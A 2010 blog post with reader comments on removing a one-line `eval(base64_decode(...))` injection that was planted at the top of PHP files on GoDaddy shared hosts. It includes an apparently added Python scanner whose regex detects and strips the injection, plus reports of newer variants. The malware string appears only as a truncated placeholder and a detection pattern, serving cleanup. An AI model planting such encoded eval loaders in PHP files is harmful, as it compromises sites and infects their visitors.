
Godaddy hacked again. Another way to cure your site.

Posted on May 17th, 2010 by


Godaddy got hacked again this morning (This is what Godaddy has to say about it). Update: and again on May 20. And again on September 18 and September 21.

If you host your blog on Godaddy, you would do well to check your site regularly for any malware, and here is how.

The hack is the same as the previous 4 hacks, affecting thousands of sites: a one-line piece of malware is inserted at the top of every single .php file on your site, starting with:

<?php /**/ eval(base64_decode("goobledegoob"))

I described before how to cure it, but here is another, slightly more sophisticated way: it first lists the infected files, prompts you to continue, deletes the oneliner malware from all of your .php files, and then lists the cured files. It is inspired by a script written by Andy Stratton in this post.
Running the script, even on a large site, takes only about half a minute.

The script will not only work for Godaddy + WordPress, but for any PHP-based site (I used it this morning to cure a Drupal site) on any host.

The script is also a quick way to find out if your site is actually infected. Just run it as described below. If there are no infected files, it will say so and won’t prompt to cure anything.

Here are the right steps to follow:

  1. Make sure you back up your site first. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like Filezilla works fine.
  2. ….Lemme double check: you made a backup, right? If you did not, or you do not know how to make one, don’t proceed, and get some help.
  3. Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
    (Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.php)
  4. FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc.):
    GoDaddy Root Directory

    If you only want to clean a subdirectory (and the tree beneath it), put the file in that subdirectory instead, but remember that the URL in the next step will have to reflect that.

  5. Then run the script by opening this URL in your browser:

    http://yoursite.com/fixfiles.php

    or

    http://yoursite.com/subdir/fixfiles.php

    if you put the script in a subdirectory.

  6. The script will first scan for the malware code in your files, both in the directory it was put in and in all directories below it.
    If you get the message:

    0 Infected Files in ./

    …then your site is clean.
    If any malware is found, the script will list the infected files and prompt you to fix them:

    malware found - fix the files

    Click on “Fix Files”, then click OK on the prompt to proceed:

    Prompt to fix malware
    The script will scan through all files again, and clean the malware. It will list all files that were cleaned.

    Malware scan finished

  7. Delete the “fixfiles.php” file from your site after execution.
  8. If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users, even though you cleaned your .php code.
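As an added example (not the fixfiles.php script from the post, nor Andy Stratton's), here is the same scan-then-cure logic as a local Python script meant to run over the backup copy from step 1. It removes only the matched injection rather than the whole first line, so it also copes with the later mutation reported in the comments, where the oneliner is glued to, or has replaced, the file's own `<?php` tag. The root path argument and the sample strings are assumptions.

```python
"""List and cure .php files that start with the injected eval(base64_decode(...)) oneliner.

Added example: run it over the local FTP backup copy from step 1, not on the live host.
"""
import argparse
import os
import re

# The oneliner the post describes, anchored to the very start of the file. Tolerates
# single or double quotes, an optional ';' and an optional closing '?>'; a trailing
# newline, when present, is consumed together with the injection.
SIGNATURE = re.compile(
    rb'^<\?php\s*/\*\*/\s*eval\(base64_decode\((["\'])[A-Za-z0-9+/=]*\1\)\)\s*;?'
    rb'(?P<close>\s*\?>)?[ \t]*\r?\n?'
)


def is_infected(data: bytes) -> bool:
    """True when the file content starts with the injected oneliner."""
    return SIGNATURE.match(data) is not None


def cure_bytes(data: bytes) -> tuple[bytes, bool]:
    """Return (cleaned content, was_infected), removing only the matched injection."""
    m = SIGNATURE.match(data)
    if m is None:
        return data, False
    rest = data[m.end():]
    # Two layouts seen in the comments. With a closing '?>' the file's own '<?php'
    # follows (next line, or glued on the same line) and is left untouched. Without
    # '?>' the injection has replaced the file's own opening tag and the original
    # code follows in PHP mode, so the tag is put back instead of being lost.
    if m.group('close') is None and not rest.lstrip().startswith(b'<?'):
        rest = b'<?php\n' + rest
    return rest, True


def scan(root: str) -> list[str]:
    """Recursively list every infected .php file under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, 'rb') as fh:
                    if is_infected(fh.read()):
                        hits.append(path)
    return sorted(hits)


def cure(paths: list[str]) -> list[str]:
    """Rewrite the listed files in place; return the ones actually changed."""
    cured = []
    for path in paths:
        with open(path, 'rb') as fh:
            cleaned, hit = cure_bytes(fh.read())
        if hit:
            with open(path, 'wb') as fh:
                fh.write(cleaned)
            cured.append(path)
    return cured


if __name__ == '__main__':
    ap = argparse.ArgumentParser(description=__doc__)
    ap.add_argument('root', help='directory to scan, e.g. the local backup of /html')
    ap.add_argument('--fix', action='store_true', help='cure instead of only listing')
    args = ap.parse_args()
    infected = scan(args.root)
    print(f'{len(infected)} Infected Files in {args.root}')
    for p in (cure(infected) if args.fix else infected):
        print(('cured ' if args.fix else 'infected ') + p)
```

Without `--fix` it only lists, which mirrors the "0 Infected Files" check in step 6; run it on the backup first, then on the live tree only once the listing looks right.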

All of that is “curing” the problem. I have looked everywhere, but have yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on Godaddy) in combination with PHP vulnerabilities, which the hosting companies have been unable to identify and/or close.

Until such time, scan your sites regularly, and cure the problem immediately before your visitors get infected.

Picture courtesy Owning Pink




50 Comments to “Godaddy hacked again. Another way to cure your site.”

  1. Many thanks for this.

    Thankfully I’ve only ever used GoDaddy as a Domain registrar service, and not used their hosting (although I recognize the fact that it’s not just them being infected but that they are a principal target) but this ‘fix’ will be very useful for my readers who have not been so fortunate in their hosting provider decisions.

    Hostgator seem to be doing something right though, as their clients have not so far been affected – but maybe they have yet to be targeted!

    I contacted my hosting provider in Europe who assures me that they are monitoring the situation closely and learning any security lessons that they find might need addressing.

    • Peter says:

      Hi Clive,

      Thanks. I looked at Hostgator. Indeed they seem to have been saved from the latest hacks. What was not clear, though, was if their packages include the installation services Godaddy has, where Drupal, WordPress etc. can be installed by a click of a button.
      I am pretty savvy manipulating Drupal and WP, but am absolutely ignorant at system level, so “auto install” would be a must for me.

      Another question: have you ever tried their auto-migrate services where they take an existing site and domain and migrate it to their hosting service for free?

      thanks,

      Peter

  2. Peter says:

    Sorry, leaving an answer to one of my questions: It seems hostgator uses Fantastico to install 3rd party applications…

    So that leaves the question if anyone ever tried their migration services?

    Peter

  3. Jon Marks says:

    Thanks! I used your script to temporarily bring my site back to life. I’m also sick to death of GoDaddy. Slow, unstable and now this. If you fancy a GoDaddy rant …

    http://jonontech.com/2010/05/18/godaddy-godaddy-you-bastards-im-through/

    • Peter says:

      Glad it helped, Jon!
      I am looking for a Godaddy alternative myself… Not too happy about it either…

      Peter

      • Matthew says:

        I’ve been happy with Media Temple. I had moved all of my sites over there except for the one that got infected (on godaddy). http://thecompleteself.com

        I’m implementing your fix as we speak. If all goes well, you will no longer see a blocked site. next I need to ask Google to recheck the site.

        Thanks,

        matthew

  4. Ted says:

    Thanks for your time and script too. I ran it on two of my gd hosted sites and they were both ok. Would have taken a lot longer to do it manually.

  5. JaykGrey says:

    “(Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.txt)”

    Do you mean “fixfiles.php”?

  6. John Soares says:

    I hope I’ll avoid the attacks now that I’ve left Godaddy and moved all of my WordPress sites to Hostgator.

    My fingers are crossed…

    • Peter says:

      John,

      I am seriously contemplating to move too… Did they do the migration for you, or did you move everything yourself?

      Peter

  7. Hostgator (basically the same as bluehost) are normally helpful with their live chat tech support. A request to enable shell access (required a scan of photo ID) was sorted within an hour.

    However, all my sites were attacked in the same way as listed above, (around May 19th I think) so I don’t think that their security is necessarily better than godaddy’s, using this attack as evidence.

    Finally, I’d recommend using their simplescripts service over fantastico, as WP upgrades are made available more quickly, and is a little more flexible.

  8. Aaron says:

    I ran this test and got this script, am i in the green or is my site infected?

    Warning: opendir(./\_db_backups\) [function.opendir]: failed to open dir: No such file or directory in D:\Hosting\4769296\html\fixfiles.php on line 35
    0 Infected Files in ./

    • Peter says:

      Hi Aaron:

      • Looks like the script could not open the directory “_db_backups” (which is typically where the hosting company puts the backups of your SQL database). Would it be possible the directory was deleted while the script ran? Does that directory exist, i.e. can you see it with FTP? I guess re-running the script gives the same error message, does it? Can it be opened? (On my site, the directory has the file protection value 705.)
        Apart from this error opening that particular subdirectory, it looks like indeed your site is not infected.
      • If you want to double-check, you can always put the script in a subdirectory, e.g. \wp_content, and run it from there as http://yoursite.com/wp_content/fixfiles.php… Know that then ONLY that subdirectory (and other directories beneath it) will be checked/cured, and not the whole site.

      P.

  9. emm | dleig'blog says:

    [...] done some temporary fix (which you can find here) that goes through all the files on your system and removes the evil PHP. However, it’s only [...]

  10. [...] it was @BloggerTip on Twitter who pointed me to this potential fix. It is currently 8:43pm ET and I am just now doing a backup of my gspn.tv website before I go [...]

  11. Wendy says:

    They got my site too. A call to Godaddy and they said *I* must have loaded something bad on my site, and they knew NOTHING of it nor were they at fault. They wouldn’t acknowledge any problem after going to my website. This fixed it right up. Thank you so much!!!

    • Peter says:

      You are welcome.

      As a hint: when I have a problem which I suspect to be caused by a problem others might also be experiencing, like GoDaddy hosting, I do a quick Twitter search on that subject. There’s a big chance you’re not the first one, if it is a common problem.
      E.g. a Twitter search on “Godaddy” last night revealed just how massive the hacking was (again).
      With that data at hand, there is no way their support can send you off with a dumb message like they gave you…

      PS: On Twitter, @Godaddy was quick to confirm they were being hacked.

  12. Amanda says:

    I am confused as to what to do. I added the zip to my HTML root directory but how do I do the rest?

    • Peter says:

      Ciao Amanda.

      Please follow the instructions step by step.
      As per instructions:
      - Download the zip file onto your computer.
      - It contains a file called “fixfiles.php”. Extract it and store it on your computer.
      - Save it as fixfiles.php
      - FTP the “fixfiles.php” file to the root directory of your blog.
      - in your browser, type the url “http://www.yoursite.com/fixfiles.php

      Let me know if you still have problems.

      Peter

  13. Godaddy WordPress Sites Hacked – How To Fix ? | Services For Seo says:

    [...] check this post on how to fix [...]

  14. [...] might want to either call them, or try this out. Either way, it works. Of the last few days, something had been happened, at least on my end, with [...]

  16. SidMizard says:

    Great solution, it works on godaddy

  17. Bravo says:

    you hit me on twitter letting me know how to fix my site

    just got hit AGAIN, and looks like this site did too

    so heads up

  18. BlogTipss says:

    I think GoDaddy is good place to buy and sell domains but most worst place to get hosting service.

  19. Bren FM says:

    Howdy!

    just migrated a site from GoDaddy to Hostgator and this little beasty came along for the ride. Your script is SUPER helpful, ta… but one thing to note – the latest mutation features whacking the php code into the first line but NOT using a line break… so your script has not only stripped out the malicious code but the opening php tag on EVERY php script on my Joomla site. Not getting at you about it, as I appreciate the help… just thought you’d like to know so maybe you could adjust your code!

    • Peter says:

      Hi Bren,

      Sorry for the trouble.. It seems indeed that the newest virus does not leave that empty line.
      Let me see what I can do to adapt the code!

      Would it be possible to email me an infected .php file to test?

      Peter (at) theroadtothehorizon (dot) org

  20. Danny Diaz says:

    Thanks a million for this. I got hit by the same type of thing this weekend on a GoDaddy shared server, though they’re moving to a strategy of embedding a single-line Javascript URL forwarder into the first line of _almost_ every file named, “index.php”. The script provided on this page only needed minor tweaks to detect and remove the current strain of attack, thanks a lot for this.

  21. Dave says:

    Hi, this fix looks great, this is attacking my sites again now, but I’ve not been able to remove the code with your fix. What could I change to make it work? I’m on Hostmonster, not GoDaddy. Thanks! The code I get now is:

    eval(base64_decode("…"));

    • Peter says:

      Hi Dave,

      I have answered you via Email.. The problem is that indeed the code signature keeps on changing, so also the “fix” code should be adapted…

  22. Umer says:

    Hi,

    I’ll have to say that your solution is a cure not the prevention.

    I myself am a PHP expert and I have seen the script of fixfiles.php. It only searches for “<?php /**/ eval(base64_decode(" in the beginning of the file and if it finds it, it lists that as a reported file. But there are so many other kinds of malware lines which get inserted at the beginning of the file, e.g. "…" and iframes also get inserted. This script won’t cure them unless we modify the script a little bit for those conditions as well.

    One can set this file execution using cron job and run it daily so whenever the site gets attacked, fixfiles script will fix that. But again, it will just be a cure not prevention.

    Godaddy is not that cause of it, there are many other sites hosted on other servers like hostgator, bluehost which are facing the same problem.

    A simple solution is to re-upload a fresh copy of your script to the server. But still there are situations where this doesn’t help e.g. if the virus is in the database or in a plugin/extension etc.

    I am working on it to find the permanent cure, will get back once done.

    Thanks,
    Umer

    • Peter says:

      @Umer: I fully agree with you on all accounts. It is a cure. And only a cure for the first batch of mass-infections, which happened about a year ago. Since then the infection “signatures” have changed. Should be easy to change that in the script. If I were a PHP programmer, I’d love to make a script that prompts for the signature.

      True too that this script only cures infected .php files, for base64-signatures. There are many other ways a site can get infected.

      True too, this is curing, and prevention would be better. I covered a couple of those in another post, but none of them is water-tight.
      At the time of the first mass infections, the hackers clearly got in via Godaddy, and got hold of FTP login credentials. Changing the credentials helped many. But the leak did not come from the sites themselves, but from the hosting service (e.g. I never use FTP, only SFTP)…

      If you ever come up with a more flexible way to cure, and a more watertight way to prevent, I’d be happy to write a post about it. (And you would help many people along the way too!)

      best,
      Peter

  23. Chris Raymond says:

    Peter,
    I have tried to upload this to the root directory at my GD WordPress site, via Transmit, and the file never appears, just files that begin with .pureftpd-upload. followed by a long string of digits. Files that I now cannot delete.

    Is this good news, i.e., GD is preventing me from uploading executable php at root?

    • Peter says:

      [edit: sorry got confused on which blogpost this comment was made... thought it was on the post to avoid malware being uploaded via .jpg files... My mistake... so forget what I wrote below.]

      Chris,
      No, that is not exactly how it works. Some content management systems allow users to upload files e.g. avatars. If a hacker would do that, and know where the file is stored (and hide php code in the uploaded file), and execute it, then he is in.
      So you’d have to mimic a user on your site.

      To simulate it, though, you can transfer the file to your site using FTP, and then execute it from the directory where you uploaded it.

      hope this helps,

      Peter

  24. Dawn says:

    Hi – I tried it – it says 0 files, but I know that I have the base64 hacks in the files. So I’m not sure why it’s saying none… :(

    • Peter says:

      Dawn,

      The cleanup routine is based on the hacking code “signature” from 2 years ago.
      it is looking for any file where the FIRST line starts with:

      <?php /**/ eval(base64_decode(

      Check the .php files on your server and see which base64 code the hackers have put in your files. IF the hacked files contain a string on the FIRST line of your .PHP file, but it does not match the above search criteria, you need to copy that piece of code and put it into my cleanup routine. Has to be an exact copy.

      If your site is hosted by a commercial hosting provider, it might be good to contact their support and ask them to look at your files, and if possible cure them. As we are now 2 years after the first of these hacks came in, most hosting providers have cleanup scripts now... Might be a safer option for you, as in the meantime, hackers have diversified their hack and now inject other code in other places.

      If your site was hacked through the timthumb backdoor, you will cure it in yet another way (again, your hosting provider should be able to help you)

      Let me know if you need further assistance!

      Peter

      • Danny Diaz says:

        We actually found that if you’ve got multiple base64 signatures in your code, you need to look for an auto-generation script in your code. Our Joomla code was riddled with base64 and javascript redirection code, and we eventually found the auto-generation script that was embedded in our Joomla code to randomly insert the hacked code in-place. It was an impressive piece of code, I should have kept it around, it did char/ascii translation from a huge string that was ascii encoded (and didn’t throw any red flags).

        Good luck.
        -Danny

        • Peter says:

          Glad you were able to cure it, Danny.

          “When it all started”, i mean this code injection on a massive scale, two years ago, it was simple to cure, as it was just one piece of code injected at the first line of the .php file. You cured that, secured your site (if they did not get in through a backdoor of a shared server itself) and you were done.. But now, this type of hacking got more sophisticated. With the Timthumb backdoor, I saw how the hackers’ script had found one old timthumb script, and must have “tagged” it, as in the weeks to come, they tried to inject one file with a bit of code. Once they did that, again, they must have flagged it “that they got in”, they executed that code, which did a whole series of operations on my site. They actually created an entire subsite (in a /subdirectory), which was a PC virus injector (infected anyone who visited that subsite).
          The moment they had that site set up, they sent out a spam email to a massive list of people, directing them to that subsite.

          I got to know about it, as someone went to my actual site, found the “contact me” details and emailed me, warning of the infection. I was able to clean it all up in a few hours, but in the meantime, Google had already banned that subsite as malicious (I admit, they were really quick), and at the same time, secured the email spamming-backdoor from my domain.

          I think the time when we webmasters can say “Oh it won’t happen to me” is over. The hacking attempts are on such a massive scale, and play that close on the ball, that the moment a vulnerability is discovered, as of the next days, their servers start searching for sites with that vulnerability already.

          Wish us luck, protecting one’s site will only become more and more difficult.

          Peter

  25. KG says:

    I ran the file and now my site doesn’t load at all. It throw this message. Help!

    /** * Front to the WordPress application. This file doesn’t do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define(‘WP_USE_THEMES’, true); /** Loads the WordPress Environment and Template */ require(‘./wp-blog-header.php’); ?>

    • Peter says:

      KG,

      It seems it displays your “index.php” file, in the home directory of your WordPress installation.
      I am not sure why it displays, but check that it literally contains the following: (the part between the “—”, but don’t include the “–”)


      <?php
      /**
      * Front to the WordPress application. This file doesn't do anything, but loads
      * wp-blog-header.php which does and tells WordPress to load the theme.
      *
      * @package WordPress
      */

      /**
      * Tells WordPress to load the WordPress theme and output it.
      *
      * @var bool
      */
      define('WP_USE_THEMES', true);

      /** Loads the WordPress Environment and Template */
      require('./wp-blog-header.php');
      ?>

      I am afraid that if your index.php got corrupted, more .php files might be corrupted.

      What happened: when you ran the script, did it come up with a number of infected files, before you cure it? What did you see in the infected files.

      Peter

  26. KG says:

    Hey Peter,
    It showed me a long list of corrupted files and hit fix files and then it said zero infected. Now when you go to my site, http://www.sorryforpartyin.com, it’s like it’s parked on dreamhost. Where did my WordPress go? All my files are in FTP still.

    KG

    • Peter says:

      How did the index.php look like, when you compared it to what I attached in the previous comment?

      If all else fails, I suggest you restore the site from the backup you made before the fixing (still infected), and ask Dreamhost support to clean up your files. I think by now, Dreamhost should have become more routine’d with cleaning up these infections.

      The problem is that the hacker’s signature keeps on changing, so it becomes hard to detect unless if the code in the cleanup php file is adapted accordingly.

  27. Paul says:

    Hi Peter,
    I just did exactly the same as KG and got the same problem. It looks like it has removed the <?php tag at the end of the first line which needs to be left where it is, similar problem to Bren FM above. If you changed the code for him I'd be grateful for a copy!
    Thanks
    Paul

  28. GARRS says:

    I noticed I had a certificate problem. I also noticed godaddy, which I had never noticed before. By random click following I wound up at a site of a man named Huckabee, an internet business, and go daddy information.

    I can clearly say, in north Georgia there is a bonding group called Huckabee. I can NOT however say whether they participate in internet detective work, filtering or investigation.

    The only common threads: I’m facing some NT based exploits, adware exploits, I have a godaddy certificate I did not purchase, and following godaddy I wound up at a site owned by someone named Huckabee.
